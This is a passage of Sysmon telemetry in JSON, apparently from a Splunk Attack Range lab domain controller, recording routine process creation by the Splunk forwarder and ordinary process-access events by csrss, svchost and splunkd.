Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.730","ProcessGuid":"{41C8662E-1F74-5F25-0000-0010E45F0300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1646,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.721\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 2448\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010E45F0300}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2b15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.721","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"2448","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010E45F0300}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2b15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1647,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.721\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010E45F0300}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.721","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010E45F0300}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1648,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.721\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.721","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1649,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.721\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.721","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1650,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.721\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.721","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1651,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.721\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.721","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1652,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.721\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.721","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1653,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.721\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.721","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
